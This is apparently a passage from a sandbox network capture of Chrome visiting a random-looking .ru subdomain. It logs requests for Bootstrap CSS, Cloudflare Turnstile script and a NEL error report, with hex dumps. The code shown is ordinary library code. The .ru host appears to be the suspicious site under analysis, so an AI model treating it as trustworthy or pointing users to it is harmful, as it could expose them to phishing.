                                                                                                                                                                                    2024-01-26 13:41:29 UTC1378INData Raw: 3b 77 69 64 74 68 3a 61 75 74 6f 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 78 78 6c 2d 31 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 78 78 6c 2d 32 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 35 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 78 78 6c 2d 33 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 33 33 2e 33 33 33 33 33 33 33 33 33 33 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 78 78 6c 2d 34 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 32 35 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 78 78 6c 2d 35 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 32 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 78 78 6c 2d 36 3e 2a 7b 66 6c 65
                                                                                                                                                                                    Data Ascii: ;width:auto}.row-cols-xxl-1>*{flex:0 0 auto;width:100%}.row-cols-xxl-2>*{flex:0 0 auto;width:50%}.row-cols-xxl-3>*{flex:0 0 auto;width:33.3333333333%}.row-cols-xxl-4>*{flex:0 0 auto;width:25%}.row-cols-xxl-5>*{flex:0 0 auto;width:20%}.row-cols-xxl-6>*{fle
                                                                                                                                                                                    2024-01-26 13:41:29 UTC1378INData Raw: 2e 67 78 2d 34 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 31 2e 35 72 65 6d 7d 2e 67 2d 34 2c 2e 67 79 2d 34 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 3a 31 2e 35 72 65 6d 7d 2e 67 2d 35 2c 2e 67 78 2d 35 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 33 72 65 6d 7d 2e 67 2d 35 2c 2e 67 79 2d 35 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 3a 33 72 65 6d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 35 37 36 70 78 29 7b 2e 63 6f 6c 2d 73 6d 2d 61 75 74 6f 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 61 75 74 6f 7d 2e 63 6f 6c 2d 73 6d 2d 31 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 38 2e 33 33 33 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 73 6d 2d 32 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 31
                                                                                                                                                                                    Data Ascii: .gx-4{--bs-gutter-x:1.5rem}.g-4,.gy-4{--bs-gutter-y:1.5rem}.g-5,.gx-5{--bs-gutter-x:3rem}.g-5,.gy-5{--bs-gutter-y:3rem}@media (min-width:576px){.col-sm-auto{flex:0 0 auto;width:auto}.col-sm-1{flex:0 0 auto;width:8.33333333%}.col-sm-2{flex:0 0 auto;width:1
                                                                                                                                                                                    2024-01-26 13:41:29 UTC1378INData Raw: 2d 73 6d 2d 34 2c 2e 67 78 2d 73 6d 2d 34 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 31 2e 35 72 65 6d 7d 2e 67 2d 73 6d 2d 34 2c 2e 67 79 2d 73 6d 2d 34 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 3a 31 2e 35 72 65 6d 7d 2e 67 2d 73 6d 2d 35 2c 2e 67 78 2d 73 6d 2d 35 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 33 72 65 6d 7d 2e 67 2d 73 6d 2d 35 2c 2e 67 79 2d 73 6d 2d 35 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 3a 33 72 65 6d 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 37 36 38 70 78 29 7b 2e 63 6f 6c 2d 6d 64 2d 61 75 74 6f 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 61 75 74 6f 7d 2e 63 6f 6c 2d 6d 64 2d 31 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 38 2e 33 33 33 33 33 33 33 33 25 7d 2e 63 6f
                                                                                                                                                                                    Data Ascii: -sm-4,.gx-sm-4{--bs-gutter-x:1.5rem}.g-sm-4,.gy-sm-4{--bs-gutter-y:1.5rem}.g-sm-5,.gx-sm-5{--bs-gutter-x:3rem}.g-sm-5,.gy-sm-5{--bs-gutter-y:3rem}}@media (min-width:768px){.col-md-auto{flex:0 0 auto;width:auto}.col-md-1{flex:0 0 auto;width:8.33333333%}.co


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    9192.168.2.1649731104.17.2.1844436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:29 UTC649OUTGET /turnstile/v0/api.js HTTP/1.1
                                                                                                                                                                                    Host: challenges.cloudflare.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                    Referer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2024-01-26 13:41:29 UTC320INHTTP/1.1 302 Found
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:29 GMT
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    vary: accept-encoding
                                                                                                                                                                                    cache-control: max-age=300, public
                                                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                                                    location: /turnstile/v0/g/ea25f566/api.js
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92c7bc9e56743-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:41:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    10192.168.2.164973335.190.80.14436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:29 UTC502OUTPOST /report/v3?s=x3TYwlaqsyOhwm2S9MZBAtjo4fPOvx4m1v39y%2FH8AGcQh6la3Zr%2BBsw1d2tnhxGnOhEclm9BX1Fj6pROtWkg8OpxCIGtAbcMnafyA4FSdPAL7pzaDAIYlcKWwRevy%2BbV78aJZ653j4vwfynH4f5vEhwVv9w%3D HTTP/1.1
                                                                                                                                                                                    Host: a.nel.cloudflare.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    Content-Length: 428
                                                                                                                                                                                    Content-Type: application/reports+json
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2024-01-26 13:41:29 UTC428OUTData Raw: 5b 7b 22 61 67 65 22 3a 32 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 34 34 39 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 37 39 2e 39 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 62 67 67 63 77 76 65 6b 6e 33 61 78 69 33 66 66 7a
                                                                                                                                                                                    Data Ascii: [{"age":2,"body":{"elapsed_time":1449,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"104.21.79.9","status_code":404,"type":"http.error"},"type":"network-error","url":"https://bggcwvekn3axi3ffz
                                                                                                                                                                                    2024-01-26 13:41:29 UTC168INHTTP/1.1 200 OK
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    date: Fri, 26 Jan 2024 13:41:29 GMT
                                                                                                                                                                                    Via: 1.1 google
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    11192.168.2.1649734104.17.2.1844436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:29 UTC660OUTGET /turnstile/v0/g/ea25f566/api.js HTTP/1.1
                                                                                                                                                                                    Host: challenges.cloudflare.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                    Referer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2024-01-26 13:41:30 UTC296INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:30 GMT
                                                                                                                                                                                    Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                    Content-Length: 38245
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92c7f1b77b05d-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:41:30 UTC1073INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 75 74 28 65 2c 72 2c 74 2c 6f 2c 66 2c 73 2c 6d 29 7b 74 72 79 7b 76 61 72 20 70 3d 65 5b 73 5d 28 6d 29 2c 67 3d 70 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 75 29 7b 74 28 75 29 3b 72 65 74 75 72 6e 7d 70 2e 64 6f 6e 65 3f 72 28 67 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 67 29 2e 74 68 65 6e 28 6f 2c 66 29 7d 66 75 6e 63 74 69 6f 6e 20 6c 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 74 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 66 29 7b 76 61 72 20 73 3d 65 2e 61 70 70 6c 79 28 72 2c 74 29 3b 66 75 6e 63 74
                                                                                                                                                                                    Data Ascii: "use strict";(function(){function ut(e,r,t,o,f,s,m){try{var p=e[s](m),g=p.value}catch(u){t(u);return}p.done?r(g):Promise.resolve(g).then(o,f)}function lt(e){return function(){var r=this,t=arguments;return new Promise(function(o,f){var s=e.apply(r,t);funct
                                                                                                                                                                                    2024-01-26 13:41:30 UTC1369INData Raw: 21 31 2c 6d 2c 70 3b 74 72 79 7b 66 6f 72 28 74 3d 74 2e 63 61 6c 6c 28 65 29 3b 21 28 66 3d 28 6d 3d 74 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 26 26 28 6f 2e 70 75 73 68 28 6d 2e 76 61 6c 75 65 29 2c 21 28 72 26 26 6f 2e 6c 65 6e 67 74 68 3d 3d 3d 72 29 29 3b 66 3d 21 30 29 3b 7d 63 61 74 63 68 28 67 29 7b 73 3d 21 30 2c 70 3d 67 7d 66 69 6e 61 6c 6c 79 7b 74 72 79 7b 21 66 26 26 74 2e 72 65 74 75 72 6e 21 3d 6e 75 6c 6c 26 26 74 2e 72 65 74 75 72 6e 28 29 7d 66 69 6e 61 6c 6c 79 7b 69 66 28 73 29 74 68 72 6f 77 20 70 7d 7d 72 65 74 75 72 6e 20 6f 7d 7d 66 75 6e 63 74 69 6f 6e 20 64 74 28 29 7b 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 49 6e 76 61 6c 69 64 20 61 74 74 65 6d 70 74 20 74 6f 20 64 65 73 74 72 75 63 74 75 72 65 20 6e
                                                                                                                                                                                    Data Ascii: !1,m,p;try{for(t=t.call(e);!(f=(m=t.next()).done)&&(o.push(m.value),!(r&&o.length===r));f=!0);}catch(g){s=!0,p=g}finally{try{!f&&t.return!=null&&t.return()}finally{if(s)throw p}}return o}}function dt(){throw new TypeError("Invalid attempt to destructure n
                                                                                                                                                                                    2024-01-26 13:41:30 UTC1369INData Raw: 74 75 72 6e 29 26 26 73 2e 63 61 6c 6c 28 66 29 2c 30 29 3a 66 2e 6e 65 78 74 29 26 26 21 28 73 3d 73 2e 63 61 6c 6c 28 66 2c 75 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 73 3b 73 77 69 74 63 68 28 66 3d 30 2c 73 26 26 28 75 3d 5b 75 5b 30 5d 26 32 2c 73 2e 76 61 6c 75 65 5d 29 2c 75 5b 30 5d 29 7b 63 61 73 65 20 30 3a 63 61 73 65 20 31 3a 73 3d 75 3b 62 72 65 61 6b 3b 63 61 73 65 20 34 3a 72 65 74 75 72 6e 20 74 2e 6c 61 62 65 6c 2b 2b 2c 7b 76 61 6c 75 65 3a 75 5b 31 5d 2c 64 6f 6e 65 3a 21 31 7d 3b 63 61 73 65 20 35 3a 74 2e 6c 61 62 65 6c 2b 2b 2c 66 3d 75 5b 31 5d 2c 75 3d 5b 30 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 20 37 3a 75 3d 74 2e 6f 70 73 2e 70 6f 70 28 29 2c 74 2e 74 72 79 73 2e 70 6f 70 28 29 3b 63 6f 6e 74 69 6e 75 65 3b
                                                                                                                                                                                    Data Ascii: turn)&&s.call(f),0):f.next)&&!(s=s.call(f,u[1])).done)return s;switch(f=0,s&&(u=[u[0]&2,s.value]),u[0]){case 0:case 1:s=u;break;case 4:return t.label++,{value:u[1],done:!1};case 5:t.label++,f=u[1],u=[0];continue;case 7:u=t.ops.pop(),t.trys.pop();continue;
                                                                                                                                                                                    2024-01-26 13:41:30 UTC1369INData Raw: 75 74 65 22 7d 29 28 24 7c 7c 28 24 3d 7b 7d 29 29 3b 76 61 72 20 44 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 5f 46 41 49 4c 53 3d 22 61 6c 77 61 79 73 2d 66 61 69 6c 73 22 2c 65 2e 53 4f 4d 45 54 49 4d 45 53 5f 46 41 49 4c 53 3d 22 73 6f 6d 65 74 69 6d 65 73 2d 66 61 69 6c 73 22 2c 65 2e 4b 45 45 50 53 5f 4c 4f 4f 50 49 4e 47 3d 22 6b 65 65 70 73 2d 6c 6f 6f 70 69 6e 67 22 2c 65 2e 54 4f 4f 5f 53 4c 4f 57 3d 22 74 6f 6f 2d 73 6c 6f 77 22 2c 65 2e 4f 54 48 45 52 3d 22 6f 74 68 65 72 22 7d 29 28 44 65 7c 7c 28 44 65 3d 7b 7d 29 29 3b 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 29 7b 72 65 74 75 72 6e 20 48 28 5b 22 61 75 74 6f 22 2c 22 64 61 72 6b 22 2c 22 6c 69 67 68 74 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 46 65 28 65 29 7b
                                                                                                                                                                                    Data Ascii: ute"})($||($={}));var De;(function(e){e.ALWAYS_FAILS="always-fails",e.SOMETIMES_FAILS="sometimes-fails",e.KEEPS_LOOPING="keeps-looping",e.TOO_SLOW="too-slow",e.OTHER="other"})(De||(De={}));function Ue(e){return H(["auto","dark","light"],e)}function Fe(e){
                                                                                                                                                                                    2024-01-26 13:41:30 UTC1369INData Raw: 29 7d 66 75 6e 63 74 69 6f 6e 20 47 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 47 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 7c 7c 66 75 6e 63 74 69 6f 6e 28 6f 2c 66 29 7b 72 65 74 75 72 6e 20 6f 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 66 2c 6f 7d 2c 47 28 65 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 4f 74 28 65 2c 72 29 7b 69 66 28 74 79 70 65 6f 66 20 72 21 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 72 21 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 72 26 26 72 2e 70 72 6f 74
                                                                                                                                                                                    Data Ascii: )}function G(e,r){return G=Object.setPrototypeOf||function(o,f){return o.__proto__=f,o},G(e,r)}function Ot(e,r){if(typeof r!="function"&&r!==null)throw new TypeError("Super expression must either be null or a function");e.prototype=Object.create(r&&r.prot
                                                                                                                                                                                    2024-01-26 13:41:30 UTC1369INData Raw: 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 47 28 66 2c 6f 29 7d 2c 53 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 4e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 26 26 28 6b 28 72 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 7c 7c 74 79 70 65 6f 66 20 72 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 3f 72 3a 77 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6b 74 28 65 29 7b 76 61 72 20 72 3d 54 65 28 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6f 3d 4a 28 65 29 2c 66 3b 69 66 28 72 29 7b 76 61 72 20 73 3d 4a 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 66 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 6f 2c 61 72 67 75 6d 65 6e 74 73 2c 73 29
                                                                                                                                                                                    Data Ascii: umerable:!1,writable:!0,configurable:!0}}),G(f,o)},Se(e)}function Nt(e,r){return r&&(k(r)==="object"||typeof r=="function")?r:we(e)}function kt(e){var r=Te();return function(){var o=J(e),f;if(r){var s=J(this).constructor;f=Reflect.construct(o,arguments,s)
                                                                                                                                                                                    2024-01-26 13:41:30 UTC1369INData Raw: 72 79 7b 66 6f 72 28 76 61 72 20 73 3d 65 2e 77 69 64 67 65 74 4d 61 70 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 28 29 2c 6d 3b 21 28 74 3d 28 6d 3d 73 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 3b 74 3d 21 30 29 7b 76 61 72 20 70 3d 68 65 28 6d 2e 76 61 6c 75 65 2c 32 29 2c 67 3d 70 5b 30 5d 2c 75 3d 70 5b 31 5d 2c 78 3b 75 2e 77 61 74 63 68 63 61 74 2e 73 65 71 3d 65 2e 77 61 74 63 68 43 61 74 53 65 71 2c 75 2e 77 61 74 63 68 63 61 74 2e 6c 61 73 74 41 63 6b 65 64 53 65 71 3d 3d 3d 30 26 26 28 75 2e 77 61 74 63 68 63 61 74 2e 6c 61 73 74 41 63 6b 65 64 53 65 71 3d 65 2e 77 61 74 63 68 43 61 74 53 65 71 29 3b 76 61 72 20 77 3d 58 28 67 29 3b 69 66 28 21 77 29 7b 75 2e 77 61 74 63 68 63 61 74 2e 6d 69 73 73 69 6e 67 57 69 64 67 65 74 57 61 72 6e
                                                                                                                                                                                    Data Ascii: ry{for(var s=e.widgetMap[Symbol.iterator](),m;!(t=(m=s.next()).done);t=!0){var p=he(m.value,2),g=p[0],u=p[1],x;u.watchcat.seq=e.watchCatSeq,u.watchcat.lastAckedSeq===0&&(u.watchcat.lastAckedSeq=e.watchCatSeq);var w=X(g);if(!w){u.watchcat.missingWidgetWarn
                                                                                                                                                                                    2024-01-26 13:41:30 UTC1369INData Raw: 74 69 6f 6e 20 51 65 28 65 2c 72 29 7b 65 2e 77 61 74 63 68 43 61 74 49 6e 74 65 72 76 61 6c 3d 3d 3d 6e 75 6c 6c 26 26 28 65 2e 77 61 74 63 68 43 61 74 49 6e 74 65 72 76 61 6c 3d 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 28 65 2c 72 29 7d 2c 5a 74 29 29 7d 66 75 6e 63 74 69 6f 6e 20 24 65 28 65 29 7b 76 61 72 20 72 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 61 72 67 75 6d 65 6e 74 73 5b 31 5d 21 3d 3d 76 6f 69 64 20 30 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 21 31 3b 65 2e 77 61 74 63 68 43 61 74 49 6e 74 65 72 76 61 6c 21 3d 3d 6e 75 6c 6c 26 26 28 65 2e 77 69 64 67 65 74 4d 61 70 2e 73 69 7a 65 3d 3d 3d 30 7c 7c 72 29 26 26 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 65 2e 77 61 74 63 68 43 61 74 49
                                                                                                                                                                                    Data Ascii: tion Qe(e,r){e.watchCatInterval===null&&(e.watchCatInterval=setInterval(function(){tr(e,r)},Zt))}function $e(e){var r=arguments.length>1&&arguments[1]!==void 0?arguments[1]:!1;e.watchCatInterval!==null&&(e.widgetMap.size===0||r)&&clearInterval(e.watchCatI
                                                                                                                                                                                    2024-01-26 13:41:30 UTC1369INData Raw: 65 6e 74 4e 6f 64 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 74 3d 3d 3d 76 6f 69 64 20 30 7c 7c 74 2e 72 65 70 6c 61 63 65 43 68 69 6c 64 28 6d 2c 6f 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 44 74 28 65 2c 72 29 7b 76 61 72 20 74 3d 65 2e 5f 70 53 74 61 74 65 3b 72 65 74 75 72 6e 20 74 3f 28 72 2e 69 73 52 65 61 64 79 3d 74 2e 69 73 52 65 61 64 79 2c 72 2e 69 73 52 65 63 61 70 74 63 68 61 43 6f 6d 70 61 74 69 62 69 6c 69 74 79 4d 6f 64 65 3d 74 2e 69 73 52 65 63 61 70 74 63 68 61 43 6f 6d 70 61 74 69 62 69 6c 69 74 79 4d 6f 64 65 2c 72 2e 6c 61 73 74 57 69 64 67 65 74 49 64 78 3d 74 2e 6c 61 73 74 57 69 64 67 65 74 49 64 78 2c 72 2e 73 63 72 69 70 74 57 61 73 4c 6f 61 64 65 64 41 73 79 6e 63 3d 74 2e 73 63 72 69 70 74 57 61 73 4c 6f 61 64 65 64 41 73 79 6e 63 2c 72 2e
                                                                                                                                                                                    Data Ascii: entNode)===null||t===void 0||t.replaceChild(m,o)}}function Dt(e,r){var t=e._pState;return t?(r.isReady=t.isReady,r.isRecaptchaCompatibilityMode=t.isRecaptchaCompatibilityMode,r.lastWidgetIdx=t.lastWidgetIdx,r.scriptWasLoadedAsync=t.scriptWasLoadedAsync,r.
                                                                                                                                                                                    2024-01-26 13:41:30 UTC1369INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 29 7b 69 66 28 74 79 70 65 6f 66 20 65 21 3d 22 73 74 72 69 6e 67 22 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 64 6a 62 32 3a 20 65 78 70 65 63 74 65 64 20 73 74 72 69 6e 67 2c 20 67 6f 74 20 22 2e 63 6f 6e 63 61 74 28 74 79 70 65 6f 66 20 65 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 6b 28 65 29 29 29 3b 66 6f 72 28 76 61 72 20 72 3d 35 33 38 31 2c 74 3d 30 3b 74 3c 65 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 6f 3d 65 2e 63 68 61 72 43 6f 64 65 41 74 28 74 29 3b 72 3d 72 2a 33 33 5e 6f 7d 72 65 74 75 72 6e 20 72 3e 3e 3e 30 7d 76 61 72 20 61 65 3d 21 31 2c 79 3d 7b 74 75 72 6e 73 74 69 6c 65 4c 6f 61 64 49 6e 69 74 54 69 6d 65 3a 2b 6e 65 77 20 44 61 74 65
                                                                                                                                                                                    Data Ascii: }function Wt(e){if(typeof e!="string")throw new Error("djb2: expected string, got ".concat(typeof e=="undefined"?"undefined":k(e)));for(var r=5381,t=0;t<e.length;t++){var o=e.charCodeAt(t);r=r*33^o}return r>>>0}var ae=!1,y={turnstileLoadInitTime:+new Date


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    12192.168.2.1649737151.101.65.2294436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:30 UTC386OUTGET /npm/bootstrap@5.0.2/dist/css/bootstrap.min.css.map HTTP/1.1
                                                                                                                                                                                    Host: cdn.jsdelivr.net
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2024-01-26 13:41:31 UTC772INHTTP/1.1 200 OK
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 431289
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    Access-Control-Expose-Headers: *
                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                    Cache-Control: public, max-age=31536000, s-maxage=31536000, immutable
                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                    Content-Type: application/json; charset=utf-8
                                                                                                                                                                                    X-JSD-Version: 5.0.2
                                                                                                                                                                                    X-JSD-Version-Type: version
                                                                                                                                                                                    ETag: W/"694b9-2M/U4pWaPGocADj0hkYVVEo5tc8"
                                                                                                                                                                                    Accept-Ranges: bytes
